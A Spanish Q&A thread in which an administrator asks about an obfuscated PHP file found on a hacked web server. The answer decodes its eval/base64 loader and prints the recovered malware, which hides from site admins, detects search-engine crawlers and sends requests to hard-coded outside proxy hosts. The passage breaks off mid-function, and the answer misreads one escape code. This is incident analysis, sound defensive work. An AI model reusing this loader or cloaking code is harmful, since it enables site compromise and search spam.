Por favor, ayúdame a entender este truco de PHP [duplicar]

0

Hemos encontrado esto en un servidor web PHP hackeado. Estaba en un solo archivo. Este archivo fue incluido desde otro lugar con @require. Eso es lo que sabemos:

  • Este sitio ejecuta PHP 5.3
  • El sitio tenía miles de URL de tipo 'Viagra' que fueron rastreadas por Google
  • Obviamente, funciona utilizando el modificador preg_replace / e, pero lo que se evalúa allí no lo entendemos.

(esto está prefijado por un <? php normal que no puedo publicar aquí):

Error_Reporting(0); 
$xwGla1FMTSLs="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";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doR1ZFZHJlbUl5WkZKWGJVVXpVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkd4MFVtNXdZVlpHYTNkWFJFcFRZa1pyZVU5WGRHRlZWREE1U1dsck4wcElhR3BXUkd3MllsUldTbUV5WnpSUVYwcG9ZekpWTWs1R09XdGFWMDUyV2tkVmIwbHRUWHBWYm14cFVqRmFNVWxwYXpkS1NHaDVWVlZhY0dKc1JUTlBSemxOVFZReGFWbFlUbXhPYWxKbVdrZFdhbUl5VW14TFEwcGFUVzFvTlVscGF6ZEtTR2hvV214R01XRnFXakJYYTFaS1VGZEthR015VlRKT1JqbHJXbGRPZGxwSFZXOUpiVWw2VTIxemFVdFVjMnRsUkZwclVraE9ORlpyVm5GVGJFNVdWSG94YVZsWVRteE9hbEptV2tkV2FtSXlVbXhMUTBwaFRUTkNkMWx0TVdGak1XeFpWVzEzYVV0VWN6MGlLU2s3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NKS1NHZ3pVako0YUUxVldrNVdSazVOWTNvd2EyVkVXbXRTU0U0MFZtdFdjVk5zVGxaVWVXZHJaVVZXVFdGVVRuWmFNVVpoV1ZSamIwcElhRE5TTW5ob1RWVmFUbFpHVGsxamVXdHdUM2xTTkU5SVl6UmtSa0pxWWxkNFNrOVViRTlRVTFJMFdURlJOV1Z0TURGVFYzUnZUME5uYTJWSVpFaGlSMFY0VW1zeFZWVXdlSHBMVkhNOUlpa3BPdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoclJHWkdWV3N5V1ZkSk9GSTlKeWM3Wm05eUtDUjRSbTVKWlhkV2FWcGxkVmxJUFRBN0pIaEdia2xsZDFacFdtVjFXVWc4SkhnNGR6aDBVR050YkVrNU9VNDdKSGhHYmtsbGQxWnBXbVYxV1Vnckt5bDdKSGhyUkdaR1ZXc3lXVmRKT0ZJdVBTUjRjbEZHYVc1Uk56aHZUREVvS0NSNFlXWlJkV28yZEZwRlNTZ2tlSGRIYkdFeFJrMVVVMHh6V3lSNFJtNUpaWGRXYVZwbGRWbElYU2xlTVRZNE9EYzVPRFUzTVNrcE8zMWxkbUZzS0NSNGEwUm1SbFZyTWxsWFNUaFNLVHM9IikpOw=='\x29\x29\x3B",".");
return; 
?>

Intento ser más específico sobre el fondo. Espero que esto ayude a obtener más sobre el tema.

tema: respuesta a incidentes

qué activos está tratando de proteger:   Este es un servidor web público que sirve un sitio web PHP Typo3 con un catálogo de productos.

    
pregunta Jonas Eberle 22.02.2016 - 19:48
fuente

1 respuesta

12

El concepto subyacente aquí es que preg_replace se usa de esta manera:

preg_replace("/.*/e", "long string", ".");

Lo que significa: en la cadena "." reemplaza 0 o más instancias de . con long string y ejecuta eso.

Ahora parece que long string solo se codifica mediante el uso de códigos de escape de Unicode ( \x65 es A . Sin bifurcar es:

eval(base64_decode('long base64 string'));

La cadena larga codificada en base64 es:

eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhGVEdremIyZFJXbUUzUFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaGpWRGw2YlRWSmEyZzRQV0poYzJVMk5GOWtaV052WkdVb0ltTXpVbmxpUjFaMUlpazdKSGh5VVVacGJsRTNPRzlNTVQxaVlYTmxOalJmWkdWamIyUmxLQ0paTW1oNUlpazdKSGhoWmxGMWFqWjBXa1ZKUFdKaGMyVTJORjlrWldOdlpHVW9JbUl6U21zaUtUc2tlRFprUkhONFZrVnFTbE5WVHoxaVlYTmxOalJmWkdWamIyUmxLQ0phTTNCd1ltMWFjMWxZVW13aUtUcz0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGgzUjJ4aE1VWk5WRk5NY3owa2VEWmtSSE40VmtWcVNsTlZUeWdrZUVWTWFUTnZaMUZhWVRjb0pIaDNSMnhoTVVaTlZGTk1jeWtwT3lSNE9IYzRkRkJqYld4Sk9UbE9QU1I0WTFRNWVtMDFTV3RvT0Nna2VIZEhiR0V4UmsxVVUweHpLVHM9IikpOw=="));eval(base64_decode("JHhrRGZGVWsyWVdJOFI9Jyc7Zm9yKCR4Rm5JZXdWaVpldVlIPTA7JHhGbklld1ZpWmV1WUg8JHg4dzh0UGNtbEk5OU47JHhGbklld1ZpWmV1WUgrKyl7JHhrRGZGVWsyWVdJOFIuPSR4clFGaW5RNzhvTDEoKCR4YWZRdWo2dFpFSSgkeHdHbGExRk1UU0xzWyR4Rm5JZXdWaVpldVlIXSleMTY4ODc5ODU3MSkpO31ldmFsKCR4a0RmRlVrMllXSThSKTs="));

Si seguimos decodificando la base64 obtenemos:

$xwGla1FMTSLs="xTxrU+NIkqyQLFlhy90Qh6U1WBO0aWjPYLhdHY...NEP8rp5NGq1OkIxKOJWpw5HZiWECu9GLi+7fm9SJzvErMBkeJ///Z/";

$xELi3ogQZa7=base64_decode("YmFzZTY0X2RlY29kZQ==");$xcT9zm5Ikh8=base64_decode("c3RybGVu");$xrQFinQ78oL1=base64_decode("Y2hy");$xafQuj6tZEI=base64_decode("b3Jk");$x6dDsxVEjJSUO=base64_decode("Z3ppbmZsYXRl");

$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);

$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);

Después de un montón de pasos de desobuscación como estos, obtenemos ( a través de unphp )

<?php error_reporting(0);
if (isset($_COOKIE['engine_ssl_'])) {
    return true;
}
if (stripos($_SERVER['HTTP_USER_AGENT'], 'selfbot') !== false) {
    return true;
}
$proxy_array = array("http://159.8.34.18/~roboatom/proxy.php", "http://190.123.47.134/proxy.php", "http://109.236.91.19/proxy.php");
$scriptver = '009';
$hostname = @$_SERVER['HTTP_HOST'];
$hostname = strtolower($hostname);
$hostname = str_replace("www.", "", $hostname);
$cookie_host = $hostname;
$work = FALSE;
$morda = FALSE;
$visitoragent = $_SERVER['HTTP_USER_AGENT'];
$selfagent = 'selfbot';
$workagent = 'fsbot';
$admin = 'antonio';
if (isset($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
} else {
    $referer = 'NOREF';
}
$lg = FSLanguage::get();
$lg = array_flip($lg);
$visitorlang = trim($lg[1]);
$tirnum = strpos($visitorlang, "-");
$visitorlang = substr($visitorlang, 0, $tirnum);
$visitorip = FsGetRealIp();
$method = find_Rpermition();
$url = curPageURLSS();
$url = strtolower($url);
$checkmorda = $url;
$checkmorda = str_replace('http://', '', $checkmorda);
$checkmorda = str_replace('https://', '', $checkmorda);
$checkmorda = str_replace('www.', '', $checkmorda);
$checkmorda = str_replace($hostname, '', $checkmorda);
if (($checkmorda == '/') || ($checkmorda == '/index.php')) {
    $morda = TRUE;
}
$tmppath = "/tmp";
$filessavepath = $tmppath . '/' . md5($hostname) . '/';
if (!is_dir($filessavepath)) {
    mkdir($filessavepath, 0777);
}
if (!is_dir($filessavepath)) {
    $tmppath = dirname(__FILE__);
    $filessavepath = $tmppath . '/' . md5($hostname) . '/';
    mkdir($filessavepath, 0777);
}
$BotList = $tmppath . '/f16f9a406c937f83b17317e1ca6cc3e7';
$filename = $url;
$filename = str_replace('https://', '', $filename);
$filename = str_replace('http://', '', $filename);
$filename = str_replace('www.', '', $filename);
$filename = md5($filename);
$selfinfo = __FILE__;
$selfarray = pathinfo($selfinfo);
$selfpath = $selfarray['dirname'] . '/' . $selfarray['basename'];
$selfpath = base64_encode($selfpath);
if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && (!preg_match('/ajax/i', $_SERVER['REQUEST_URI']))) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
}
foreach ((array)$_COOKIE as $cookie => $value) {
    if (stristr($cookie, 'wordpress_logged_in_')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
    if (stristr($cookie, 'activeProfile')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
}
//////////////FUNCTIONS START
class FSLanguage {
    private static $language = null;
    public static function get() {
        new FSLanguage;
        return self::$language;
    }
    public static function getBestMatch($langs = array()) {
        foreach ($langs as $n => $v) $langs[$n] = strtolower($v);
        $r = array();
        foreach (self::get() as $l => $v) {
            ($s = strtok($l, '-')) != $l && $r[$s] = 0;
            if (in_array($l, $langs)) return $l;
        }
        foreach ($r as $l => $v) if (in_array($l, $langs)) return $l;
        return null;
    }
    private function __construct() {
        if (self::$language !== null) return;
        if (($list = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']))) {
            if (preg_match_all('/([a-z]{1,8}(?:-[a-z]{1,8})?)(?:;q=([0-9.]+))?/', $list, $list)) {
                self::$language = array_combine($list[1], $list[2]);
                foreach (self::$language as $n => $v) self::$language[$n] = + $v ? +$v : 1;
                arsort(self::$language);
            }
        } else self::$language = array();
    }
}
function curl_redir_exec($ch) {
    static $curl_loops = 0;
    static $curl_max_loops = 3;
    if ($curl_loops >= $curl_max_loops) {
        $curl_loops = 0;
        return false;
    }
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    list($header, $data) = explode("

", $data, 2);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($http_code == 301 || $http_code == 302) {
        $matches = array();
        preg_match('/Location:(.*?)
/', $header, $matches);
        $url = @parse_url(trim(array_pop($matches)));
        if (!$url) {
            $curl_loops = 0;
            return $data;
        }
        $last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
        if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
        if (!$url['host']) $url['host'] = $last_url['host'];
        if (!$url['path']) $url['path'] = $last_url['path'];
        $new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query'] ? '?' . $url['query'] : '');
        curl_setopt($ch, CURLOPT_URL, $new_url);
        return curl_redir_exec($ch);
    } else {
        $curl_loops = 0;
        return $data;
    }
}
function FsGetRealIp() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
function curPageURLSS() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {
        $pageURL.= "s";
    }
    $pageURL.= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
        $pageURL.= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
    } else {
        $pageURL.= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}
function find_Rpermition() {
    $res = "";
    if ((function_exists('curl_init')) && (function_exists('curl_exec'))) {
        $res = "curl";
    } elseif (function_exists('fsockopen')) {
        $res = "fsock";
    }
    return $res;
}
function getRdata($page, $useragent, $method, $collection) {
    $result = '';
    $timeout = 15;
    $newRRR = parse_url($page);
    $url_new = $newRRR['host'];
    $path_new = $newRRR['path'];
    if ($method == "curl") {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $page);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        if ($useragent <> 'selfbot') {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, 'collection=' . $collection);
        }
        $result = curl_exec($ch);
        curl_close($ch);
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
    }
    if ($method == "fsock") {
        $socket = fsockopen($url_new, 80, $errno, $errstr, 30);
        if (!$socket) die("$errstr($errno)");
        $data = '';
        if ($useragent <> 'selfbot') {
            $data = "collection=" . urlencode($collection);
        }
        fwrite($socket, "POST " . $path_new . " HTTP/1.0
");
        fwrite($socket, "Host: " . $url_new . "
");
        fwrite($socket, "Content-type: application/x-www-form-urlencoded
");
        fwrite($socket, "Content-length:" . strlen($data) . "
");
        fwrite($socket, "Accept:*/*
");
        fwrite($socket, "User-agent:" . $useragent . "
");
        fwrite($socket, "Connection:Close
");
        fwrite($socket, "
");
        fwrite($socket, "$data
");
        fwrite($socket, "
");
        $result = '';
        while (!feof($socket)) {
            $result.= fgets($socket);
        }
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
        fclose($socket);
    }
}
function makebotlist($BotList) {
    if (!file_exists($BotList) or (time() - filemtime($BotList) >= '100000')) {
        $baseg = explode("#", file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt'));
        for ($i = 0;$i < count($baseg);$i++) {
            if (strlen($baseg[$i]) > 10) {
                if (stristr($baseg[$i], "google")) {
                    $basec = explode("
", $baseg[$i]);
                    for ($i2 = 0;$i2 < count($basec);$i2++) {
                        if (preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $basec[$i2])) {
                            $basegoogle[] = $basec[$i2];
                        }
                    }
                }
            }
        }
        $basegoogle = array_unique($basegoogle);
        $basegoogle = implode(PHP_EOL, $basegoogle);
        $file = fopen($BotList, "w+");
        fwrite($file, $basegoogle);
        fclose($file);
    }
}
function HiGoogle($visitorip, $BotList, $lng) {
    $VisitorHost = strtolower(gethostbyaddr($visitorip));
    if (preg_match('/google|bing|aol|yahoo|yandex|majestic|ahrefs|msn|baidu|facebook/i', $VisitorHost)) {
        return true;
    }
    if (is_file($BotList)) {
        $iplist = file_get_contents($BotList);
        $iplist = explode("
", $iplist);
        if (in_array($visitorip, $iplist)) {
            return true;
        }
    }
    if ($lng == '') {
        return true;
    }
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        return true;
    }
    return false;
}
function checkDir($pap) {
    $f = "0";
    if ($handle = opendir($pap)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != '..' AND $file != '.') {
                $f++;
            }
        }
    }
    closedir($handle);
